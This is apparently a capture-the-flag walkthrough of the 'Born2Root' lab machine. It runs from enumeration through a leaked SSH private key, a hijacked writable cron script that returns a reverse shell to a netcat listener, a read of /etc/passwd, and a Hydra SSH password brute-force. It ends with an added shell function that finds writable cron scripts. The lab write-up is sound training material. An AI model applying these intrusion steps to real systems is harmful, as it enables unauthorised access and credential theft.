Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cron jobs.

We begin our enumeration of the target by launching two nmap scans. The first one identifies open ports, and the second one attempts to discover more information about each service. The service scan fingerprints the target as a Linux host running Apache 2.4.10 (Debian):

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|_http-server-header: Apache/2.4.10 (Debian)

We have a web server running on port 80, and when browsing to the website we find a company web page with general and contact related information. We should take note of the username martin, which appears twice on this page: in the About Us section and in the Contact Us section.

Next we use GoBuster to brute-force the web server for any other directories, using the common.txt wordlist:

$ gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt -u http://<target>

Gobuster finds a directory named /icons containing a text file, VDSoyuAXiO.txt, which holds an RSA private key. We download the key and save it to a file (only part of the key is reproduced here):

MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
[...]
RlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+

Let's give this key proper permissions (chmod 600, since ssh refuses to use a private key that other users can read) and then use it with ssh -i to log in as martin. We can just hit enter when prompted for a password.

$ id
uid=1001(martin) gid=1001(martin) groups=1001(martin)

Checking all the cron jobs scheduled on the system, we find an entry in the system crontab that runs a Python script every five minutes as a user named jimmy. The script file /tmp/sekurity.py is writable by our user even though cron executes it as jimmy, so whatever we put in it will run with jimmy's privileges:

*/5 * * * * jimmy python /tmp/sekurity.py

We copy a Python reverse shell into sekurity.py, chmod +x it, and wait up to five minutes for the cron job to execute it. We need to set up a netcat listener on our Kali machine to catch the reverse shell that is going to be executed on the target system. After a few minutes, we catch our shell:

$ sudo nc -lvp 80
192.168.54.49: inverse host lookup failed: Unknown host
connect to [...] from (UNKNOWN) [192.168.54.49] 52400
/bin/sh: 0: can't access tty; job control turned off

The shell we receive is not attached to a tty, so we upgrade it to a proper one with Python's pty module:

$ python -c 'import pty; pty.spawn("/bin/bash")'

Login Brute-Force

Let's check /etc/passwd to get a list of the users on the system:

$ cat /etc/passwd
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[...]

The user hadi stands out, as he is another user mentioned on the company web page. Since his name is public, a reasonable first guess is that his password contains it, so we build a wordlist from every rockyou.txt entry that contains "hadi":

$ grep hadi /usr/share/wordlists/rockyou.txt > /home/kali/hadi.txt

Now we can brute-force hadi's SSH password with Hydra using that wordlist (-l takes a single login name, -P a file of candidate passwords):

$ hydra -t 4 -l hadi -P /home/kali/hadi.txt 192.168.120.52 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task
[22][ssh] host: 192.168.120.52   login: hadi   password: hadi123
1 of 1 target successfully completed, 1 valid password found

We find that the password is hadi123, and now we simply switch from our current user to hadi with the recovered password:

$ su hadi
$ id
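The cron job hijack above works because the script that cron runs as jimmy is writable by a less privileged user. As an added example that is not part of the original writeup, the POSIX shell function below scans a crontab in /etc/crontab's six-field format and reports every job whose command line contains an absolute path the current user can write to. The function name is my own, and the sample crontab in the comments is constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original writeup: find cron jobs whose script a
# low-privileged user can overwrite. A system crontab line such as
#   */5 * * * * jimmy python /tmp/sekurity.py
# is hijackable when /tmp/sekurity.py is writable by someone other than jimmy
# or root: whatever that user writes into the file runs as jimmy on the next
# tick. The function name and the sample paths are my own choices.

# hijackable_cron_jobs <crontab-file>
# Reads a crontab in /etc/crontab format (minute hour dom month dow USER command)
# and prints "user command path" for each job whose command line contains an
# absolute path that is writable by the current user.
hijackable_cron_jobs() {
    crontab_file="$1"
    # Drop comments, blank lines and VAR=value assignments (SHELL=, PATH=, MAILTO=)
    grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_]+=' "$crontab_file" |
    while read -r min hour dom mon dow user cmd args; do
        # Check every token that looks like an absolute path, not just the first
        # one: "/usr/bin/python /tmp/sekurity.py" has a safe interpreter path in
        # front of the writable script.
        for a in $cmd $args; do
            case "$a" in
                /*)
                    # -w reflects the *current* user's access, so run this from
                    # the low-privileged shell you actually have (martin in the
                    # writeup); as root every file looks writable.
                    if [ -w "$a" ]; then
                        printf '%s %s %s\n' "$user" "$cmd" "$a"
                        break
                    fi
                    ;;
            esac
        done
    done
}

# Usage on a live system (constructed invocation, prints one line per finding):
#   hijackable_cron_jobs /etc/crontab
#   for f in /etc/cron.d/*; do hijackable_cron_jobs "$f"; done
```

Files under /etc/cron.d use the same six-field layout, so the second usage line covers them too. Per-user crontabs (crontab -l) have no user column and are not parsed by this function.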